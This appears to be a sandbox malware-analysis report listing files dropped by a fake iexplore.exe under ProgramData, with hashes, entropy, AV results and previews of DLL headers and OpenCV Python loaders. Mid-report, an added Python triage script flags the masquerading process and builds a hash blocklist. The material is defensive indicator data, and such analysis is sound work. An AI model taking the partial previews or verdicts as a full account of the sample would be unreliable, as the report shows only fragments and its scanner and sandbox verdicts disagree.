SHA-256:2ED73364A84581E67B5CE98EE8F69DDC03F49A202A94F367E9855B50EB8AE9A4
SHA-512:D56BF9A90F05BA17119886A82218E60B1A2C31DD05396AB4894523658C6299A353AADA786B6272CE1FE88886D17AC43F0D71DBEF569DDBCC71D1621FF27FE5D7
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):13048
Entropy (8bit):6.778226882900008
Encrypted:false
SSDEEP:192:wnWlC0i5CNWchWdU/3XjDBQABJtUUtpwBqnajry37Od:wnWm5CNWchWdmXjDBRJHqliyd
MD5:34664EA68D4DC7B94015A90869B55604
SHA1:5BD6ABB07694159E4BB9B979669BD674747892EA
SHA-256:C45FD7FE182B3EDD287F5AE36E8E77198885BE931607CA207AF7DC8489B60BAD
SHA-512:4AC1B9CAA40988E313E6075445906C372E8F0D6FD3E3092D2358E9584BB0F0C51586C8579EA8C4031D314A6D5ECE31BFA8F4025225800F33EF9B290EDB8D7DC3
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):11512
Entropy (8bit):6.886646397973874
Encrypted:false
SSDEEP:192:QY17aFBRwWchWt1U/3XjDBQABJhKZRqnajlthwn:JVWchWt1mXjDBRJhyRl7I
MD5:FD5925326354D9186891EB6DA64DA666
SHA1:3786F18FFD4B8F2E053F1568529C6B2C4A3D1B69
SHA-256:05E695D316B0AB969CC221A99BF6F2581CBE5DADD2B966E811D151DFC9DBAEB4
SHA-512:AAD816E7C124AB0CBB3D1F5B472ED5E74F568DF7B2DA14D802D3E25A86FB3BDA3C4D1F60CCD89AA07A941D48BEFABD0506403E4F3A10B770947649C1E234032E
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):11512
Entropy (8bit):6.8416175287863235
Encrypted:false
SSDEEP:192:1UdWchWBU/3XjDBQABJceinEqnajxmQR7:idWchWBmXjDBRJ6ElsQR
MD5:9A69EB348D7BC3C58E2E30FB2B8DD62B
SHA1:F18B5D1EFED27DE795207B413F19CF2643D9CADD
SHA-256:70E06ED73BEC7AC66C43EBAA03A020A2B976EB480DED429DB74D31D47933FE78
SHA-512:F3A74A7B311884179CEFEEB07551C09385F6F5D76A378A4F5BE66D5A155C3A8820E256B5A312F5F9FF24A5D87B7EE65DB503C7C721149C50E62263B0FC9ADF5E
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):21752
Entropy (8bit):6.259566068130637
Encrypted:false
SSDEEP:384:ku+7tbM4Oe5grykfIgTmLqWchWFQmXjDBRJi2jXlP6Hoz:GJMq5grxfInAWXj1Pii8oz
MD5:5559D8F37665F327C295B4CD1638A3F2
SHA1:36D1A51B7D1741B0C3659BE51FCB5D0C997752F1
SHA-256:0C257AB2BA4553470B14C159FEA39673FD7CFD02CEDC2AA1294AB75618E19F7F
SHA-512:AAD4B0FE7172C1472DEEFA1DCD10072AF73C14C50CB8E0B6E1B189DC9CE3BB043CF8DBB8306045BF36D0F46C9272D87664ED11670EBCCDD16528EF2A35D59510
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):12024
Entropy (8bit):6.742295990242731
Encrypted:false
SSDEEP:192:brjqjd71WchWNU/3XjDBQABJRsJSdqnaj7wX7:3jMWchWNmXjDBRJvdl/y7
MD5:0691F7DBC96E4F42908E337FC20FFE9F
SHA1:4828F5A36E20E72E7679F0A70061A3C091C4F41F
SHA-256:73747A60A92703F2EB0D83826093203357538A72CA321CFADC2E60427A6ED053
SHA-512:CB6F40517BE63DDCA0BDB9649D5DA50C11856C53C3200830EB2939E08ACE338678455ADF346DF84EA1F81FD6D0E91E4BFBE58AA5933CE87BC5337442AF1BFFC3
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):15608
Entropy (8bit):6.572932409777698
Encrypted:false
SSDEEP:192:fA/fhrpIhhf4AN5/jijWchWUU/3XjDBQABJ56UtpwBqnajry37wZM:EhrKIWchWUmXjDBRJdqli3
MD5:9ECEEDBC48924AD17950E0EF64BFC78D
SHA1:8BAD15420DCEB3E250DC88FE6EC8C5C5FD0953CB
SHA-256:9B5DFBB6027D28C1A41CAB008148E4A98BCD3D6A6D43269CD08DD8BBC366AA0F
SHA-512:F986673BCFD71CBED8EDE8E8063D3911D499C9600017781F38AB2014DB0E24467B0EBF398400D949219E84C13596248530FB9DE297AF83F98967F7FAEE55FCD3
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):17144
Entropy (8bit):6.4771834708840865
Encrypted:false
SSDEEP:192:KQx2tPbvyeyuWYFxEpahjWchWvU/3XjDBQABJF/Sn7jjT6iBTqnajR5OJfx:yTFVhjWchWvmXjDBRJsnTTXZlNIJp
MD5:6CC5E2392B5617175DA2406B7187C6C8
SHA1:055CD8FD422DE7630A256774BD90E70B1346A8A7
SHA-256:15D2AAC51EF02EB8242E7C121D4F405237DA415E4A05F41A16B8E3640DC27298
SHA-512:6B99CA77F45063BA4ECDAEA214F42E8EE3431CE03E54F5119C284385408F438273BA3C881BB71BCF4059F8AE5CE6F05A1CF36FC84A65D9BFA9CE595A0A0BE295
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):17352
Entropy (8bit):6.490243600324852
Encrypted:false
SSDEEP:384:ZUv8x0C5yguNvZ5VQgx3SbwA7yMVIkFGlvWchWo8f0DBRJwDldl99z3R:avi5yguNvZ5VQgx3SbwA71IkFsb1PY
MD5:8DB568B36F13FEEEFD150DA0B63ADCBE
SHA1:03BB29284802DB358609C2CD10398D8A5077E417
SHA-256:8597F9F239B350B86350F3CDB326BDCA49CB23022703FE049F838998A8A32CD5
SHA-512:8D57FA2975E45C2DF82634135E57F29579778A118E033F036BB093E654A9A9D6A0B450C45B24D68FAC2232D3255DBE9C88368EA8F6D697A86D035417B9CE61E6
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):13560
Entropy (8bit):6.6675957409079505
Encrypted:false
SSDEEP:192:ZCGYigrDqWchWKU/3XjDBQABJFXfH098uXqnajH/7CBO:EGY36WchWKmXjDBRJ9XuXlT7CBO
MD5:8F5ECA7B9BE54BEDE759B2BA2F018BB2
SHA1:F7FB27990F9629332074FE4A3703DD3CDACF78B9
SHA-256:9E5D937C72C6D5709B907130CF4C2BD12E3427E44D217A2047D461940C281C1F
SHA-512:45DE9E9B66303554487016D448C11CC38E6EAD5B48B8660CC311C182A7B3CC20A83063EEF0F4071CA126341B8083F4A55523445B13E060E5B745527E3B6B44D4
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d...`.a.d.....b.d...f.b.d.Richc.d.PE..L...>..\...........!......................... ...............................0.......h....@.......................................... ................... ..............8............................................................................text............................... ..`.rsrc........ ......................@..@....>..\........7...8...8.......>..\........d...p...p...RSDS9[....dF.2$L..t.....api-ms-win-crt-time-l1-1-0.pdb..........8....rdata..8........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.......................\............H...H.......(...H...........<...Z...x.......................6...S...n.......................$...A...^...{.......................B...c.......................&...K...p...........................K...k.......................%...E...^...y...........
                                                                                                                  Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):11512
                                                                                                                  Entropy (8bit):6.833217638045214
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:kWfHQdu/WchWtAU/3XjDBQABJWDPJSdqnaj7ej:kWfRWchWtAmXjDBRJmsdl/G
                                                                                                                  MD5:2BC2D1EF644E67C00E139EACD6D6F656
                                                                                                                  SHA1:56F6F85FC0A8F9F382AADD9768AE777895FCFC60
                                                                                                                  SHA-256:C6ACAD7EECD63B54C2F12610B273A6BF5B4DB737C0F8CE7670E778DD7A394E39
                                                                                                                  SHA-512:ECE35C75A697812A113C8FCB625A7E23868E9697BAE814665D28CD016AF5AEDEAE21E0D4374F611992BB29E9EDB9BBA732D5113D7A4A779EE8DEF28B99509A5D
                                                                                                                  Malicious:false
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d...`.a.d.....b.d...f.b.d.Richc.d.PE..L......\...........!......................... ...............................0......a.....@.............................^............ ................... ..............8............................................................................text...>........................... ..`.rsrc........ ......................@..@.......\........:...8...8..........\........d...t...t...RSDS..t..-.A.y2=D.......api-ms-win-crt-utility-l1-1-0.pdb...........8....rdata..8........rdata$zzzdbg.......^....edata... ..`....rsrc$01....` .......rsrc$02...................\....4...........................]...~...................%...<...U...r...............................+...B...W...p.................................../...V...m.......................5...L...g...............................!...>...O...h.......................
                                                                                                                  Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
                                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1024268
                                                                                                                  Entropy (8bit):5.540443460646943
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24576:PGHcjTosQNRs54PK4IOGpiD8pVi+ZEf6EfmLSKvFVLJ:PGHcjTosQNRs54PK4IPZ7LvZ
                                                                                                                  MD5:8386CF8ADD72BAB03573064B6E1D89D2
                                                                                                                  SHA1:C451D2F3EED6B944543F19C5BD15AE7E8832BBD4
                                                                                                                  SHA-256:2EEA4B6202A6A6F61CB4D75C78BE5EC2E1052897F54973797885F2C3B24D202C
                                                                                                                  SHA-512:2BB61F7FAC7ECC7D5654756AE8286D5FD9E2730E6AC42F3E7516F598E00FD8B9B6D3E77373994BB31D89831278E6833D379F306D52033FA5C48A786AC67DA2B2
                                                                                                                  Malicious:false
                                                                                                                  Preview:PK..........!..1Y............_bootlocale.pycB................................@....z...d.Z.d.d.l.Z.d.d.l.Z.e.j...d...r,d.d.d...Z.nJy.e.j...W.n4..e.k.rj......e.e.d...r\d.d.d...Z.n.d.d.d...Z.Y.n.X.d.d.d...Z.d.S.)...A minimal subset of the locale module used at interpreter startup.(imported by the _io module), in order to reduce startup time...Don't import directly from third-party code; use the `locale` module instead!......N..winTc................C........t.j.j.r.d.S.t.....d...S.).N..UTF-8.....)...sys..flags..utf8_mode.._locale.._getdefaultlocale)...do_setlocale..r......_bootlocale.py..getpreferredencoding...............r......getandroidapilevelc................C........d.S.).N..UTF-8r....).r....r....r....r....r...............c................C........t.j.j.r.d.S.d.d.l.}.|...|...S.).N..UTF-8r....).r....r....r......localer....).r....r....r....r....r....r.....................c................C....6...|.r.t...t.j.j.r.d.S.t...t.j...}.|.s2t.j.d.k.r2d.}.|.S.).N..UTF-8..darwin)...AssertionErro
                                                                                                                  Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):6756
                                                                                                                  Entropy (8bit):4.965960355988947
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:cHqnQbu/POjcEYIL9GE6AUmZris46/B5aVOQOo2/nH/h5M966GMBWtReWE3uSI8G:2qQSOjIKtc6/Bb/H/h2BWtc93k
                                                                                                                  MD5:EAB99B31F1FD18E46E6E081BA3B5C06E
                                                                                                                  SHA1:9CA76B1097D58EF9C652AEBFBEFF32BFEC17B25B
                                                                                                                  SHA-256:B05B8000C71987CD4DF824C1ED134B7FCD34617665E437B1AAEC128F93D7F1C3
                                                                                                                  SHA-512:7C4EA4A28F7876249B503155187BD59BCD9CF18A80264C8892E59E9FD7F3D461C91AFC4C3C177DBA48E1DFDD0FEB5705B54B504F7DAA886A2A0B72FDDD1E80FC
                                                                                                                  Malicious:false
                                                                                                                  Preview:'''..OpenCV Python binary extension loader..'''..import os..import importlib..import sys....__all__ = []....try:.. import numpy.. import numpy.core.multiarray..except ImportError:.. print('OpenCV bindings requires "numpy" package.').. print('Install it via command:').. print(' pip install numpy').. raise....# TODO..# is_x64 = sys.maxsize > 2**32......def __load_extra_py_code_for_module(base, name, enable_debug_print=False):.. module_name = "{}.{}".format(__name__, name).. export_module_name = "{}.{}".format(base, name).. native_module = sys.modules.pop(module_name, None).. try:.. py_module = importlib.import_module(module_name).. except ImportError as err:.. if enable_debug_print:.. print("Can't load Python code for module:", module_name,.. ". Reason:", err).. # Extension doesn't contain extra py code.. return False.... if not hasattr(base, name):.. setattr(sys.modules[base], name, py_
                                                                                                                  Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):748
                                                                                                                  Entropy (8bit):5.110506159030977
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:WSolITEO+RNIdjcFMlYFXe2LirYKMLFxAe5bHMnQBwmuTD9+sXWeZKMLFxAe5biw:MlY+34jamr0L7Ae5oJP9+oJL7Ae5mU9L
                                                                                                                  MD5:E8ED8F25854821C8910BCB8308507DCE
                                                                                                                  SHA1:8A3AC32D3DF44794E8A834A6B6A8A1ED3F3AA5F7
                                                                                                                  SHA-256:DE28C7B5213CCA148F09469916584611B3D66C1C8C432880259D6A3A92380213
                                                                                                                  SHA-512:F3F36EDF288A870F5E1F14F3B1113031721E12F30BF235B0E5385711E2BF7F08D0123E6AB14600AB069D2E692D81B7ABC3692FB69EED34374FEFAB3B24F03D86
                                                                                                                  Malicious:false
                                                                                                                  Preview:PYTHON_EXTENSIONS_PATHS = [.. LOADER_DIR..] + PYTHON_EXTENSIONS_PATHS....ci_and_not_headless = False....try:.. from .version import ci_build, headless.... ci_and_not_headless = ci_build and not headless..except:.. pass....# the Qt plugin is included currently only in the pre-built wheels..if sys.platform.startswith("linux") and ci_and_not_headless:.. os.environ["QT_QPA_PLATFORM_PLUGIN_PATH"] = os.path.join(.. os.path.dirname(os.path.abspath(__file__)), "qt", "plugins".. )....# Qt will throw warning on Linux if fonts are not found..if sys.platform.startswith("linux") and ci_and_not_headless:.. os.environ["QT_QPA_FONTDIR"] = os.path.join(.. os.path.dirname(os.path.abspath(__file__)), "qt", "fonts".. )..
                                                                                                                  Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):123
                                                                                                                  Entropy (8bit):5.182096540135453
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:JSxrsr+A6+Ei7/erj5Erj+7IE7Qs5O8nkz6+Eov:arsrFEoidAM7Qs5PkBEy
                                                                                                                  MD5:B13875A78A67CC7F21E7481CA29508C5
                                                                                                                  SHA1:D0EB50F0F915B3707A390C18D0AB511306504A70
                                                                                                                  SHA-256:BBCBA68E122CF9754D5E549BC17C0F8780FE120B1A9D004C993792DDE654F96C
                                                                                                                  SHA-512:BAF58DA8EB61898F3E59BCB047F46873912FA088B5C25EEE0954F6FFD3CFDC681BD16C2F50C47158718F06978490DE04AAE78A32AC3BA5DE1555AC54C2E529FF
                                                                                                                  Malicious:false
                                                                                                                  Preview:import os....BINARIES_PATHS = [.. os.path.join(os.path.join(LOADER_DIR, '../../'), 'x86/vc14/bin')..] + BINARIES_PATHS..
                                                                                                                  Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):48732672
                                                                                                                  Entropy (8bit):6.7539525149845465
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:786432:DhdkxoJUjm7c86qXQW0vgkPFZz8M6z2SO/fKxtIqai2o9tgd0n8SW3Fo6/bgeN5K:nk/jcwqXQW0vgkPFZz8M6z2SO/fKxtIH
                                                                                                                  MD5:3617796D129917E84C551B0547935B9A
                                                                                                                  SHA1:03BD22DD8B3CEFD09F862F3BA1AD1725F076C805
                                                                                                                  SHA-256:3739513D36E4B18E935A6A7C041ECD60617CF88517D7BCA64D5F1C3439DD47E0
                                                                                                                  SHA-512:21AEDC7B555C6A3A537FDBE0C56E420B157E0E3578F49A07A7D68657BB679E4BADD876ECCA426825F9455CCC2DF413E57EC704B35F92E1C8B7BB86466FD89DFF
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Preview:MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$........x;`..U3..U3..U3.DV2..U3.DP2..U3.DQ2..U3.DR2..U38..3..U3.GV2..U3.GP2..U3.GQ2..U3.DS2..U3..3".U3..U3..U3.DT2..U3.GQ2{.U3.GT2..U3..T3..U3.GP2..U3.GU2..U3.G.3..U3.GW2..U3Rich..U3........PE..L...R..d...........!......?...................?...........................................@.............................\.......@...............................L$......T...................4..........@.............?..............................text....L2......N2................. ..`IPPCODE..c...`2..d...R2............. ..`.rdata...N....?..P....?.............@..@.data....+... ......................@....tls.........P....... ..............@....gfids.......`......."..............@..@_RDATA...8.......:...8..............@..@.rsrc................r..............@..@.reloc..L$.......&...t..............@..B................................................................................
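Every record above is written by a process at C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe. A genuine Internet Explorer binary installs under C:\Program Files\Internet Explorer (or the x86 equivalent), so the path itself is a triage signal, as is the 48732672-byte DLL the sandbox marks Malicious:true while ReversingLabs reports 0%. The script below is an added example, not Joe Sandbox's code and not part of the original report: it parses the "Key:Value" records in the shape shown on this page, recomputes the 8-bit Shannon entropy behind the "Entropy (8bit)" field, flags the mis-located dropper process, and builds a SHA-256 blocklist from the PE drops and anything marked malicious. The set of legitimate iexplore.exe directories, the 7.2 packed-entropy threshold and the three-record sample (copied from this page and trimmed to the fields the script uses) are assumptions.

```python
"""Triage helper for Joe Sandbox dropped-file records (added example, not Joe Sandbox code)."""
import math
import ntpath
from collections import Counter

# Constructed input: three records from this page, trimmed to the fields used below.
SAMPLE_RECORDS = """\
Process:C:\\ProgramData\\Microsoft\\Internet Explorer\\iexplore.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):13560
Entropy (8bit):6.6675957409079505
Encrypted:false
MD5:8F5ECA7B9BE54BEDE759B2BA2F018BB2
SHA-256:9E5D937C72C6D5709B907130CF4C2BD12E3427E44D217A2047D461940C281C1F
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\\ProgramData\\Microsoft\\Internet Explorer\\iexplore.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):48732672
Entropy (8bit):6.7539525149845465
Encrypted:false
MD5:3617796D129917E84C551B0547935B9A
SHA-256:3739513D36E4B18E935A6A7C041ECD60617CF88517D7BCA64D5F1C3439DD47E0
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\\ProgramData\\Microsoft\\Internet Explorer\\iexplore.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):73
Entropy (8bit):4.5164686969838375
Encrypted:false
MD5:734F2F32C81B5CEDE1098394DAB581B5
SHA-256:F4CE16721ED7F623A4DCC443BA600D1856DB610CB2C3D53C13A8CA028CC68F6D
Malicious:false
"""

# Assumption: where a genuine iexplore.exe lives on a standard install.
LEGIT_IEXPLORE_DIRS = {
    r"c:\program files\internet explorer",
    r"c:\program files (x86)\internet explorer",
}
# Assumption: above this many bits per byte a file is usually packed or encrypted.
PACKED_ENTROPY = 7.2


def parse_records(text):
    """One dict per record; a record starts at a 'Process:' line, AV bullets are collected in a list."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("Process:"):
            current = {"Antivirus": []}
            records.append(current)
        if current is None:
            continue
        if line.startswith("•"):
            current["Antivirus"].append(line.lstrip("• ").strip())
            continue
        key, _, value = line.partition(":")  # split on the first colon only; values may contain colons
        if key != "Antivirus":
            current[key] = value.strip()
    return records


def shannon_entropy(data):
    """8-bit Shannon entropy in bits per byte: 0.0 for a constant byte stream, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def process_masquerades(proc_path):
    """True when the dropping process is called iexplore.exe but runs outside the expected directories."""
    head, tail = ntpath.split(proc_path)
    return tail.lower() == "iexplore.exe" and head.lower() not in LEGIT_IEXPLORE_DIRS


def triage(records):
    """One finding per record with the flags a responder pivots on; sandbox and AV verdicts stay separate."""
    findings = []
    for r in records:
        entropy = float(r.get("Entropy (8bit)", 0))
        findings.append({
            "sha256": r.get("SHA-256", "").lower(),
            "size": int(r.get("Size (bytes)", 0)),
            "pe": r.get("File Type", "").startswith("PE32"),
            "malicious": r.get("Malicious", "").lower() == "true",
            "av_hits": any("Detection: 0%" not in a for a in r["Antivirus"]),
            "high_entropy": entropy >= PACKED_ENTROPY,
            "dropper_masquerade": process_masquerades(r.get("Process", "")),
        })
    return findings


def block_hashes(findings):
    """SHA-256 set covering every PE drop plus anything the sandbox marked malicious."""
    return {f["sha256"] for f in findings if f["pe"] or f["malicious"]}


if __name__ == "__main__":
    results = triage(parse_records(SAMPLE_RECORDS))
    for finding in results:
        print(finding)
    print("blocklist:", sorted(block_hashes(results)))
```

The sandbox verdict ("Malicious") and the scanner result ("Antivirus") are kept as separate flags on purpose: on this page they disagree for the large DLL, and a responder needs to see that disagreement rather than a merged score. The entropy function exists so the "Encrypted:false" judgement can be reproduced on a file pulled from the victim host, not just read off the report.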

Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):73
Entropy (8bit):4.5164686969838375
Encrypted:false
SSDEEP:3:JSxrGSCcurj5ErAwGfnJFB:arGSLSdAAb
MD5:734F2F32C81B5CEDE1098394DAB581B5
SHA1:E07450D3F1924078DD09E0B1DEA8DD671DFE8801
SHA-256:F4CE16721ED7F623A4DCC443BA600D1856DB610CB2C3D53C13A8CA028CC68F6D
SHA-512:C0C9ADD6A1CD47F34C91B12AD369E887CFD28859824D258E1EED0C3495378DD950E214F8A540D66CD555ED8EFC810418DF3F13E09765D24D6FA26B09B44857C0
Malicious:false
Preview:import os....haarcascades = os.path.join(os.path.dirname(__file__), "")..

Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):9910
Entropy (8bit):4.699400257943882
Encrypted:false
SSDEEP:192:mIntUjnLP6P7B4D7BP7Bb7BSw6DfaPt0C2Vqed/:m2eBN4faPt0C2V9Z
MD5:C1F227A47A3F83C8E8C6F81F02FA0178
SHA1:94414DF87CBA543A4E3DEA2F62AE99039FA752D1
SHA-256:058B29FADBF9A8DFCC649F5505A9251E16F5F05E59109385B9FC289F8C9CCE4A
SHA-512:891B81456D86757F61497652C6EE913388B7FBC0C7FA40FA47BB35DFD4A68CD113B62C3690DFC6DF7D5594B8C87F75C09212569F6EAD2C4476A8966CD9EA718A
Malicious:false
Preview:__all__ = ['op', 'kernel']....import sys..import cv2 as cv....# NB: Register function in specific module..def register(mname):.. def parameterized(func):.. sys.modules[mname].__dict__[func.__name__] = func.. return func.. return parameterized......@register('cv2.gapi')..def networks(*args):.. return cv.gapi_GNetPackage(list(map(cv.detail.strip, args)))......@register('cv2.gapi')..def compile_args(*args):.. return list(map(cv.GCompileArg, args))......@register('cv2')..def GIn(*args):.. return [*args]......@register('cv2')..def GOut(*args):.. return [*args]......@register('cv2')..def gin(*args):.. return [*args]......@register('cv2.gapi')..def descr_of(*args):.. return [*args]......@register('cv2')..class GOpaque():.. # NB: Inheritance from c++ class cause segfault... # So just aggregate cv.GOpaqueT instead of inheritance.. def __new__(cls, argtype):.. return cv.GOpaqueT(argtype).... class Bool():.. def __new__(self):..

Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):271
Entropy (8bit):4.627093215673309
Encrypted:false
SSDEEP:6:SoSvYFyMXS/qdadew7mZ6ALNCpvdYZ4un:kUFuT7mZlCpFw4u
MD5:EED4002FFE913424133D8F19FDF1C2A8
SHA1:F232D4C5ACF73885D8E0D70418FB2E1481D9271B
SHA-256:FF583A5874BE8F848E73C2F61B3A71680995926479C9BC436E6565C5CCE7CA07
SHA-512:115F32B21E99DEC9B50C766CC685F9387A0D0C1611A41540CA23B71579E2963E04A1E940C6C8F3447A26006DBC45F17013A7FFE97BE620B74F1CF20A21505B8E
Malicious:false
Preview:# flake8: noqa..import os..import sys....if sys.version_info[:2] >= (3, 0):.. def exec_file_wrapper(fpath, g_vars, l_vars):.. with open(fpath) as f:.. code = compile(f.read(), os.path.basename(fpath), 'exec').. exec(code, g_vars, l_vars)..

Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
File Type:Python script, ASCII text executable, with CRLF line terminators
Category:dropped
Size (bytes):900
Entropy (8bit):4.775144685082797
Encrypted:false
SSDEEP:24:07TR5S1i0N0QhKNAhno3oBoIVbOXono6RnZB:07SzN0QhKNuniM5iC/r
MD5:BC3A642376D2A30F669D2E649E726487
SHA1:9370B736A43871731AF68CF288A7F6A216890D62
SHA-256:DA6F165BDCA81F9F624275B248BC7C7C76C36E77CB87EBA08167CD5F2E6BD658
SHA-512:52D56B4E6B3E6559446162D40F47C30EFD30BEED2154CC770FD6E8FA1E66278EC569529F1CB2CE7F94FE9D6AE3BDA68AEAC18891B8E30CCE0C6070C1DA994095
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:__all__ = []....import sys..import numpy as np..import cv2 as cv....# NumPy documentation: https://numpy.org/doc/stable/user/basics.subclassing.html....class Mat(np.ndarray):.. '''.. cv.Mat wrapper for numpy array..... Stores extra metadata information how to interpret and process of numpy array for underlying C++ code... '''.... def __new__(cls, arr, **kwargs):.. obj = arr.view(Mat).. return obj.... def __init__(self, arr, **kwargs):.. self.wrap_channels = kwargs.pop('wrap_channels', getattr(arr, 'wrap_channels', False)).. if len(kwargs) > 0:.. raise TypeError('Unknown parameters: {}'.format(repr(kwargs))).... def __array_finalize__(self, obj):.. if obj is None:.. return.. self.wrap_channels = getattr(obj, 'wrap_channels', None)......Mat.__module__ = cv.__name__..cv.Mat = Mat..cv._registerMatType(Mat)..

Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
File Type:Python script, ASCII text executable, with CRLF line terminators
Category:dropped
Size (bytes):38
Entropy (8bit):3.968211974414884
Encrypted:false
SSDEEP:3:1LT2QbQNQ4yL9v:1LT2Q8NQ4yJ
MD5:C6B0244719659C5EDEC0592AF112032A
SHA1:6BD926FE0C853A9938BDB5D9537BD88FD1EF5401
SHA-256:495BD79594CCE174673E372C85C4DD8F4FFDF2B3A73FD4623955B0D55DE0D462
SHA-512:28D80015309AC1AE19F048E9461D4D04B85CE16B9E68C58D7608351A39B8D3EC0235FCCFD928B0349082C702D890B6C6ABD36B8030A176BF05888AE8C493B545
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:from .version import get_ocv_version..

Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):95
Entropy (8bit):4.525707419533802
Encrypted:false
SSDEEP:3:JS4iydoKE4yLYfg+4zxNG364yLA9E5HJwv:mIXE4y0YpE6405pwv
MD5:2D3125F1843A670B9F3229A7BC362816
SHA1:E884BC3D05E5E732D1308DE67AA5F96BBF4FC69F
SHA-256:C93A418793FCB15B9B4316C0741B8336740E490E94F3B7D1EBE8CD5F6F23815C
                                                                                                                  SHA-512:BFDCF6BFC1D82E3ACAF625B5940CA169784427712F14895FD6CA92CC9C864F1A894FECF97BF2AFA6FC5CF4ABA9738A302D30024BC192F85025989C0D93A8B540
                                                                                                                  Malicious:false
                                                                                                                  Preview:import cv2......def get_ocv_version():.. return getattr(cv2, "__version__", "unavailable")..
                                                                                                                  Process:C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                  Category:dropped
